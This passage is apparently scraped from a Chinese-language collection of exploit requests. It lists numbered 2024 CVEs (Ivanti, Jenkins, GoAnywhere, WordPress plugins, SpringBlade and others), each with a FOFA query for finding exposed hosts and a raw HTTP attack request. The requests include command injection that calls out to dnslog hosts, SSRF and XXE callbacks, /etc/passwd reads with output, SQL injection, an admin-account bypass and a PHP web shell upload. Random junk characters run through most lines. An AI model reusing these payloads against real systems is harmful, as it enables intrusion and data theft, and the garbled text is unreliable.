& E v4 v8 M8 D: RContent-Type: application/x-www-form-urlencoded; charset=UTF-8# I4 I0 F3 w! w2 Y8 q
X-Requested-With: XMLHttpRequest6 U7 X5 {) D/ B' T3 X- g2 E; S
7 ^, k0 b X: p; r3 Fid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B! d5 O! t4 V# `$ r
8 b, L. Z: H5 F8 p5 I# ~. f) ?/ I) ] ~+ [& [0 J$ @, c' H
99. Ncast盈可视高清智能录播系统busiFacade RCE4 o& r% _; u% o% R x
CVE-2024-0305% T6 Y% u8 N, i& F8 j" O
FOFA:app="Ncast-产品" && title=="高清智能录播系统"0 L/ O B3 d$ Y- N. j" n
POST /classes/common/busiFacade.php HTTP/1.17 E1 M( w; ^# f. i" z0 h
Host: 192.168.40.130:8080
* T+ z3 w' Z( c( jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.02 |$ s4 Z, o5 s' ^" ~5 A2 X
Connection: close- ^# ]2 {1 }9 ^7 @" S
Content-Length: 154& Z0 n5 k: `" Y
Accept: */*% }! ~: s4 O1 k! f/ Q$ `6 A
Accept-Encoding: gzip, deflate/ Y1 L, ]1 y& j+ T( b5 T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 k5 }% }% Y1 T/ u* j, jContent-Type: application/x-www-form-urlencoded; charset=UTF-8
% v ?: C+ }# o c+ x$ I, P2 U& u& {X-Requested-With: XMLHttpRequest8 y. D3 a: H* z( e7 m
6 [' ~. j9 O7 O' C! I9 h7 g; H%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
9 `) \5 R8 ~# F4 [: V# z' F9 u G7 E) Y
( H$ G, X. a0 f" f; Y, }3 \ o; W100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传( Z$ o) [8 g z2 @0 x
CVE-2024-0352$ d; c" E6 Y9 f; C' A
FOFA:icon_hash="874152924"
+ F1 |& e9 R# H0 M, [ `POST /api/file/formimage HTTP/1.1. U" }# y$ v! R! _0 r f
Host: 192.168.40.130& ` R& @! u8 @5 W
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
, {' S" a4 e, }Connection: close
% q& ?+ D! L6 D& T5 NContent-Length: 201
* g/ z0 t* ]0 v _Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
! N( n* ~/ U- q! x" w( IAccept-Encoding: gzip: f* H6 h, M2 ~$ }
9 ~5 f& w7 S& j, x; {
------WebKitFormBoundarygcflwtei, [0 W t: g" X' \2 C; h9 ^2 c
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
3 o3 i1 `' T9 S4 o) Y6 HContent-Type: application/x-php/ a" p" a E2 j! b
0 F8 e+ u3 d+ {2ayyhRXiAsKXL8olvF5s4qqyI2O& p# M9 n0 Y& F, R
------WebKitFormBoundarygcflwtei--, Q# _. u! h' t% a; n
4 L0 y: l' o4 p1 \+ z8 W- a4 v3 x, @% _ A5 J1 `2 h3 y
101. ivanti policy secure-22.6命令注入
7 f7 M7 f/ q' Z' i+ E: h! RCVE-2024-21887
3 {; T# T! o3 H4 \6 E; W$ i- V$ RFOFA:body="welcome.cgi?p=logo"5 w. B0 C# ]. F# l0 S0 R9 s6 y
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
( Y* Y' E; C! uHost: x.x.x.xx.x.x.x" Q' u4 Y3 V$ H% v0 w* d* ^
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36$ F! Y! x& \4 s8 E- X
Connection: close
) B( ~" Q/ T c$ E# [' A# D: y8 q0 GAccept-Encoding: gzip, D6 _/ h6 q6 d7 P9 U8 H
+ Q1 Y( A* R" N! m, O( ^. `% H
+ J2 O2 i" W$ o& Q102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
, @: C7 s j% cCVE-2024-21893
% o+ j j6 Q/ b- Z" ]3 `, \" yFOFA:body="welcome.cgi?p=logo"0 A8 ~7 {1 W/ T4 o
POST /dana-ws/saml20.ws HTTP/1.1
3 c8 Y6 x- J2 h2 u0 M1 i' H& xHost: x.x.x.x
8 P% q. a$ A! O, A4 S1 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36* M/ K3 X+ [" j( \' o1 J" f
Connection: close
- V, x# I2 G8 d% W8 z( M" TContent-Length: 792
- ^' ~1 g; R( T5 UAccept-Encoding: gzip. K( V# T) j" G
1 S) r! `7 q0 V) W- r
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>/ K3 I3 q0 x" o( [3 w
, c7 Y2 I, \, ]6 F3 B
103. Ivanti Pulse Connect Secure VPN XXE% b, W9 F% q9 t8 i1 u Y/ I
CVE-2024-220240 z, m) V* h) s4 f6 b0 {
FOFA:body="welcome.cgi?p=logo"& z7 U7 s1 l6 ] ~3 v( I
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
: Y2 v4 V9 D7 N/ }8 H- d& E5 F* m2 pHost: 192.168.40.130:111# K& I: Z7 L# g; ?5 W& [. J+ S
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36; r: i: w* Y* L3 d) Y, s
Connection: close- N( P( P) `" S1 @6 d" q" t2 u
Content-Length: 204
/ O! l3 v5 {7 d0 o1 }( p' ]Content-Type: application/x-www-form-urlencoded9 d y* t. t: }2 S2 w
Accept-Encoding: gzip
+ L* O/ Z) ]4 Q# b( g P" c' D& k+ b/ v& Q, T; F- P
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
9 L1 b) y; G3 c. u- N( \
1 t/ S, |3 J6 X& X9 n. T
% y1 c; {8 g3 I2 c+ P+ T其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
* {- N v$ C( j4 X; t<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>5 F7 Y& r6 I8 q, {8 w( h ~1 F
5 x V1 X! P7 q$ H1 R |. @1 ]- ~4 m. a4 ^6 q' j
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露, o; }9 c. r1 d. Z3 G+ ~
CVE-2024-0569
4 c9 k0 C! Q# U+ i$ t- E0 M* HFOFA:title="TOTOLINK"
M4 _2 S. r) m9 c+ d# I1 U7 M4 UPOST /cgi-bin/cstecgi.cgi HTTP/1.1
: _% f0 B8 E, s; T1 @+ S& F. qHost:192.168.0.1
@! P' v% F- UContent-Length:41+ l/ P6 A- X8 C7 p. ~& s6 G
Accept:application/json,text/javascript,*/*;q=0.01
1 [" W3 d( h+ xX-Requested-with: XMLHttpRequest
* Y# ~0 |3 S7 ], k! ]User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
- P2 \+ d, L! i6 P+ ZContent-Type: application/x-www-form-urlencoded:charset=UTF-8( T, R% w- ~) J( x9 G
Origin: http://192.168.0.1! J( T1 p) ^! F: w
Referer: http://192.168.0.1/advance/index.html?time=16711523805643 f, f3 V# b. c C( y; R& }! [
Accept-Encoding:gzip,deflate6 l6 F2 {# L8 \9 y* w
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.77 {: F: t7 I2 s& u( X; w6 X
Connection:close1 y, q, D: D0 S0 z N' G
8 o7 h7 ^2 b6 w8 {0 Q2 D
{
# i7 o4 i6 C+ r$ p B# ?"topicurl":"getSysStatusCfg",
$ \. f3 ?. R* R/ ] j9 l! V' G8 {; Y"token":"" R& g2 g# e R; ]
}& n( C( o0 @9 B* i) T
/ c$ j0 W# g9 ?5 A105. SpringBlade v3.2.0 export-user SQL 注入8 Y) e5 s9 k3 k, ?9 t
FOFA:body="https://bladex.vip"
$ X( f' G0 p3 Thttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1, u6 J7 q3 z; l! Y" T
0 p0 R2 I+ ?( X. F+ ^3 X& d K2 ?' o
106. SpringBlade dict-biz/list SQL 注入3 U6 W2 L) a, u+ M
FOFA:body="Saber 将不能正常工作"* E4 ~7 ^1 j0 `. n4 b. G
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.18 i/ S0 Y7 F6 ^( }: O" c! ~" q+ |
Host: your-ip
) y. R6 D: X4 F- _: j( tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 P0 T9 c+ b% a* q
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A( B% S. h' k7 V( I' ~
Accept-Encoding: gzip, deflate
8 r$ |! C) J- }$ F5 mAccept-Language: zh-CN,zh;q=0.9
( |- K4 K. l4 ^$ @: A$ E! w0 fConnection: close
9 Y" u* K! C/ @8 J! g' p- |' H
+ m6 r4 I) Q1 P7 n! F; w
% T* A+ y& R3 Z! F5 q3 N107. SpringBlade tenant/list SQL 注入+ Z+ L, v8 U# ], ]9 f
FOFA:body="https://bladex.vip"
; |- p0 g) K* j" X1 v8 hGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.19 V3 r. ^ |! B1 v5 S' `: n% o
Host: your-ip& |. J0 C/ ~; T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 j9 V& B# F4 NBlade-Auth:替换为自己的
, x j% [; x0 l2 J3 w$ iConnection: close7 l) t) M$ B% G. k8 ]2 _$ |# O! \4 K
0 @; s1 D3 C8 Y2 N& G
" z* l3 q( t0 l) r1 B108. D-Tale 3.9.0 SSRF+ Z0 N4 g/ I4 y2 _
CVE-2024-21642- y2 P+ n4 }& j1 C
FOFA:"dtale/static/images/favicon.png"
/ ~; p6 m/ y; N$ [GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
) b$ b2 ~7 ?% l7 K3 m( H5 g4 Z: OHost: your-ip0 w8 H& ?' j" x: y
Accept: application/json, text/plain, */*
5 G" }! c! i4 W% T; PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
7 L; m( U; V9 S* g, ~" L+ dAccept-Encoding: gzip, deflate
% m6 V9 n0 k" cAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
. ~1 H: W8 K% ^; D. O+ sConnection: close* y z- |* P J
7 N& k& O& ~! |% Z: g2 C7 D& O
. `$ m4 K8 g$ L3 K6 Z; \# O* X% b8 N) Q5 i109. Jenkins CLI 任意文件读取
7 n& `% J$ e; r+ |2 i, v! A1 XCVE-2024-23897
8 ]" N* I4 I* T4 ~; T) w0 LFOFA:header="X-Jenkins"$ `) u% p/ P9 J/ n: ?& |5 B0 M% ]6 j
POST /cli?remoting=false HTTP/1.19 G1 R5 s' G- b& {8 o. D" l4 M
Host:! Z7 ?& H- r6 p3 b4 P V, E
Content-type: application/octet-stream1 @1 G! F. h; c
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
3 E- x$ ~: @/ r" n8 hSide: upload% S% Q- k% k7 _# K! p
Connection: keep-alive
4 D4 y1 Y" o/ ~5 `; `0 g6 |Content-Length: 163
$ ^6 P0 L& W+ p$ b$ {$ v" d4 U. I$ b3 U- [; S% Q; q8 H- _
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'" G% y n/ n- ^
; x& i% m7 I1 v2 A+ Y/ V, s
9 H* R) X7 l3 ~- f" ^
POST /cli?remoting=false HTTP/1.16 e/ o" s1 B1 a; P$ k5 S
Host:9 w+ p# _0 l7 T* k H8 S4 ?0 \' C) m
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92! ?5 I' f/ X6 ?0 g6 u- e; ]
download
% @, l! s+ g0 w5 FContent-Type: application/x-www-form-urlencoded
# {7 Q9 r# _3 z) \: vContent-Length: 0
. S2 [/ G% ^' ~8 n/ o/ T% Z* s: ]( h `. {- x) K* _
- x+ r4 S- b" a! z/ x6 i
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
4 X0 S# D4 p( ajava -jar jenkins-cli.jar help) W" j5 O) i" ~. F
[COMMAND]9 H! X$ u1 A- \
Lists all the available commands or a detailed description of single command.9 D3 Z3 v) n/ u/ Q8 k8 J
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
3 t$ C& ^1 W* U4 |; ^5 t
( L" |9 x& Y% y Z: c/ S" J
7 X$ L& [, }+ N% \110. Goanywhere MFT 未授权创建管理员/ m" @) i7 v7 |/ j
CVE-2024-0204 H! p3 {4 ?! Q) C+ [
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932" z7 | W- N2 O. h% r( c
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1! o% w# q! d& r/ h5 M8 \
Host: 192.168.40.130:8000
l. s6 I* y5 I2 M+ UUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36( k9 G- G" S. l7 o
Connection: close$ F; T9 Y. m# G: w/ g! d2 l
Accept: */*) Z' ^- m( H# x( }# j% ?7 V8 S& c
Accept-Language: en+ x( M4 l$ V& l( p
Accept-Encoding: gzip
% @% ?& ]9 t6 n- ?$ O6 {" g- N1 R+ B
) x: ~/ H- `; W: A) \! c111. WordPress Plugin HTML5 Video Player SQL注入! p- k* Y: w% H
CVE-2024-1061
/ b0 J4 w3 T$ d8 M |( Y1 m+ WFOFA:"wordpress" && body="html5-video-player" |$ G: [ @' r
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
j" _! ]6 a: y0 BHost: 192.168.40.130:112
, J9 c' p p# C, N; e, }! O) Q, lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36) Y- t' T M& a
Connection: close% t; X6 i0 h8 e3 }0 t, L* V& `
Accept: */*
6 y4 u1 s- F/ @# q4 BAccept-Language: en
9 p' p! K& X( V* Q, fAccept-Encoding: gzip
1 M; K% i: Y) e/ y" A# M
5 E, v4 X" G1 I0 s6 O3 }( T
# H4 x3 k) H. [# \3 ^9 T112. WordPress Plugin NotificationX SQL 注入( L W& c: r/ D3 o
CVE-2024-1698! O4 _: a5 w0 B5 d- r6 U9 [
FOFA:body="/wp-content/plugins/notificationx"
" x% `. h& \4 APOST /wp-json/notificationx/v1/analytics HTTP/1.16 Q! u0 |5 E- [$ m( l, w5 f, P
Host: {{Hostname}}
0 k8 n6 w7 ]+ J) t1 n. o* K( iContent-Type: application/json
: \4 O/ M. U, j2 h; c
; G' P: k' o$ r& N- B2 h f{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
E* |4 E( d& O7 Q% O& A; Q* y' n4 x( P
! e7 y4 W7 Z- v+ F
113. WordPress Automatic 插件任意文件下载和SSRF
6 G: d/ g" j" R6 TCVE-2024-27954
; e1 h3 O5 j6 E: z( ?FOFA:"/wp-content/plugins/wp-automatic"
) j# v/ O q4 i6 x3 T0 }GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
% i4 d! { a( L6 @Host: x.x.x.x* T: F/ R, P% E
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
* f) ]9 A E7 F' m2 }' ^Connection: close
9 U E4 F- v5 q# v6 w9 ~, o5 aAccept: */*9 ]2 V& C1 I9 _0 N, ~ O
Accept-Language: en
( v! p: y- o7 y$ @& j- z' D0 \Accept-Encoding: gzip( v0 y$ P/ u' P
- K8 K0 y4 `5 W# l) I& n
) U, Z4 t) j: d% m
114. WordPress MasterStudy LMS插件 SQL注入
; _* h( t! R: J- zFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"2 o i# n! k. |6 `1 n h
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.12 l1 w. f' e+ D$ H
Host: your-ip; n- s4 b# D4 @ Q. a, h" v$ b
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.361 ?% b4 L+ i ], D2 M+ e7 u. U
Accept-Charset: utf-8+ p% M" I. S) Q7 T4 F0 [- Z
Accept-Encoding: gzip, deflate
* `) v8 a$ E0 @3 `/ D2 p# B6 t( MConnection: close4 y6 c& P+ x3 W! w2 R
+ X0 ^* o" z$ Z& {6 W4 L) R3 f/ ~
115. WordPress Bricks Builder <= 1.9.6 RCE
4 I' X* M8 @- W/ yCVE-2024-25600
$ A' G5 M. |- H, F. D$ [FOFA: body="/wp-content/themes/bricks/"2 G, J, i- h+ a- V$ E1 s9 Y- J& t
第一步,获取网站的nonce值
Y. x0 u* \4 f. gGET / HTTP/1.1
4 P7 M+ x* k0 d6 jHost: x.x.x.x% _$ Q' F* ?8 v# F, K( f$ M" Y7 a2 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36. `; C4 u0 f1 L
Connection: close$ V; @/ |( F$ L/ p
Accept-Encoding: gzip; o. R" L9 f6 f H* B Y# K
+ h( S0 ~" e" ]8 w! y
% ]% ]: N! x+ G8 p1 L" n
第二步替换nonce值,执行命令- {* b f% h1 Y3 l. a- {
POST /wp-json/bricks/v1/render_element HTTP/1.1
: l5 s6 A* q4 B! [8 g9 b [Host: x.x.x.x
2 e5 {, e' Q' U) B% T/ NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
7 n2 m& b# F% z4 ZConnection: close
) _" G, b) Q1 u+ W+ m1 f' l3 gContent-Length: 356/ j. t$ H" @( ?6 R! b
Content-Type: application/json
' ^& l' \+ N% f) g9 G( MAccept-Encoding: gzip/ n& P9 Q- t' o0 y: h7 o; H
& y$ ` S8 J3 Y7 S2 i4 Q8 q3 A/ H- W
{* f1 ^9 g; p5 b* S" D! ?" j% J
"postId": "1",
; C$ {$ s" \1 f# ]" T$ w( q( Q "nonce": "第一步获得的值",
6 ]9 u& z! p$ \7 i: ` "element": {: S( y# R; t3 Z* S8 A" i
"name": "container",
2 W# Q$ s5 A+ M8 z9 Y3 |$ m "settings": {7 ~: _- |& q3 v+ j+ u
"hasLoop": "true",4 ?. R. f8 y0 ~6 X' ?
"query": {# [. W6 `9 |% Y `, E7 a) j
"useQueryEditor": true,# u9 @; ]& J$ B& P- V
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",+ G; R W! y! U' C! s# Y0 G g# M6 e
"objectType": "post"4 @7 ~3 p" {, d
}
4 I( R' H3 j, K }# y6 q/ r& r: Z ?
}" f: V1 V7 `, M# g
}
/ h+ X: e$ _$ a( ]3 |
1 P" J0 a1 X0 C0 _* f( B h
3 Z& { g9 e2 {& A: u& W116. wordpress js-support-ticket文件上传
- q$ Y! m0 A$ t+ x2 uFOFA:body="wp-content/plugins/js-support-ticket"* i+ u& s; j; z1 i3 J, @. C( o& f
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
! y) A: E4 y2 }+ DHost:
/ s5 y$ Z7 |0 [) rContent-Type: multipart/form-data; boundary=--------767099171
% G* w+ K5 u eUser-Agent: Mozilla/5.0
/ M& b; {; W+ e$ x& g' M& C7 J, ?0 A, Q) P
----------767099171
& I5 H+ W" g: K0 p u$ ]# S6 m6 XContent-Disposition: form-data; name="action"8 D/ o; I. X3 [4 g" M1 \2 M, u' u
configuration_saveconfiguration
8 q, w; T( ?6 {. O----------767099171- [1 K) ^, F+ e( {& f. ~5 _
Content-Disposition: form-data; name="form_request"8 O1 u/ V' O; ]4 S* x4 f: z* F
jssupportticket/ s' K8 \4 S/ n# s
----------767099171
1 @9 a% a+ x) x% {4 G; hContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
# e& O5 [# \4 v% CContent-Type: image/png$ G% i2 E5 X2 `* g5 Z$ f+ p& a7 h, f
----------767099171--! ^9 J& A+ c; f$ D( D5 D
2 ?+ V' p1 k* c6 i
2 [/ s1 y+ x. f! r Z1 m4 v/ J117. WordPress LayerSlider插件SQL注入
# Y+ T& C8 a+ V! L1 ?1 }version:7.9.11 – 7.10.0( ~# o; I% D2 f' w6 H2 S
FOFA:body="/wp-content/plugins/LayerSlider/"
: K" d# e. U3 d; C& k WGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1$ S) _8 R$ P; V6 C; v& V) e
Host: your-ip
2 Z3 N2 L8 a7 ]5 K9 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
/ _% M$ n) C+ V+ U! j7 f, D6 wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. ~3 y" t2 v% } c& y* f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! k6 d+ r. K8 t" e, T( }3 @Accept-Encoding: gzip, deflate, br
( Y: s* j) M( o5 l' zConnection: close
8 O3 {7 F0 P CUpgrade-Insecure-Requests: 1
: F6 n' D# x9 {; X6 |) M: B0 a
, z/ Z9 H" a$ _/ M" l% t; O* p7 J, X( t; Y8 l0 E
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传, @3 o4 E; [* ]6 a. Y, X
CVE-2024-0939( q" F+ |, Q- y! H
FOFA:title="Smart管理平台"& j+ \8 b6 f% u6 R: @ }5 V2 C9 Y
POST /Tool/uploadfile.php? HTTP/1.1) B6 p, i* n. l/ W. m
Host: 192.168.40.130:8443$ ~' P2 Z# ?3 R" K, G; P
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8/ F+ z: g4 ?/ C/ s8 U4 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0. w5 |4 @0 x# W( V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' ?! L* z6 S& i% ^$ R S5 }, |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ p, z" J/ G7 a: k4 i% V- k) p( J
Accept-Encoding: gzip, deflate
! @1 `/ `3 f3 @& P7 o: n& H8 L9 m3 N% uContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
) Y6 c: F' c1 \; v* X; eContent-Length: 405
; y e' f# m3 X& U b/ m. NOrigin: https://192.168.40.130:84434 ~; M" \$ Y: i" W+ Q
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
; ^. }4 Q( A, t! ^. J7 FUpgrade-Insecure-Requests: 18 h, d2 x( k: _) l4 |! o9 b
Sec-Fetch-Dest: document% w I/ v. L. M* a+ C# Z
Sec-Fetch-Mode: navigate% L) z2 `/ k6 g5 r; n1 D1 Q
Sec-Fetch-Site: same-origin: a9 S& W8 E$ `9 J! Y4 m
Sec-Fetch-User: ?1
5 b' B9 Z5 | ]/ r1 Y9 h: PTe: trailers
& u! Z1 d! `9 C# w' ]. CConnection: close6 t' V' {" Q( J0 x# h
2 ~0 A+ |: T) I. m, e- k, G-----------------------------139797012227476466340371828872 U0 M0 m J4 B @
Content-Disposition: form-data; name="file_upload"; filename="contents.php"9 }$ a& X9 P8 H
Content-Type: application/octet-stream/ W; i; @4 B( Y3 }
8 a$ G0 U1 r9 ?; p% ^<?php
7 w2 D5 y6 X; s* h6 F& asystem($_POST["passwd"]);
+ Z) j+ }2 S U) a, ]! D! k?>
) G. v2 @( P8 l8 b7 N-----------------------------13979701222747646634037182887+ q' E# L- b; J7 i% H; n/ b
Content-Disposition: form-data; name="txt_path"
D# U* z' C' L& R& R9 c) j' w' t0 P8 P- R" T3 H! J( e
/home/src.php
4 I/ g. S4 M4 N-----------------------------13979701222747646634037182887--
( P, \7 ?" B* |+ j' n3 N9 o3 C f
/ v6 ^- g8 X/ }
访问/home/src.php* z8 g9 c% Y! }' V# m6 i- q
! y2 {- w7 ?! G7 J0 H' r: `! X119. 北京百绰智能S20后台sysmanageajax.php sql注入
( z5 t2 f7 ~- L6 ~6 u' D, cCVE-2024-1254
3 O; B4 w3 N+ _; M) U1 [4 cFOFA:title="Smart管理平台"7 m6 Y# k- K1 F9 `6 }6 F% A/ a
先登录进入系统,默认账号密码为admin/admin
4 n& m% g0 U6 i$ i+ TPOST /sysmanage/sysmanageajax.php HTTP/1.11
* G* ?8 M9 ^" b' ]Host: x.x.x.x# l8 z: E0 q+ k5 R6 b$ Z" A
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee( I4 W* t7 P D) }* v5 j9 e$ m. o- R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
6 j2 H6 K( @' j" u. [Accept: */*
" j* V$ c4 k; ?7 i: G* r% \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. J& @5 T( M1 Q5 `$ {4 R% uAccept-Encoding: gzip, deflate* V. f1 [" o% w* }
Content-Type: application/x-www-form-urlencoded;
6 c- Z, {# T' R7 S9 ]: F3 `3 JContent-Length: 109
" L2 n M/ _: R# y( u/ MOrigin: https://58.18.133.60:8443
! z: Y& N4 B5 m6 XReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
# S9 I- D, s; n6 T; ySec-Fetch-Dest: empty
1 ]2 q8 U5 i) `, T2 MSec-Fetch-Mode: cors/ }0 b7 B: o) a$ \+ t" U
Sec-Fetch-Site: same-origin
" a7 V: J. o6 ~X-Forwarded-For: 1.1.1.1
8 g# n o5 e% z1 H- D0 U l9 s) zX-Originating-Ip: 1.1.1.1
4 {. v2 ?8 _3 w) J6 u, w" G' vX-Remote-Ip: 1.1.1.1
1 A8 R) q4 N. s6 ]& q, ^4 LX-Remote-Addr: 1.1.1.1
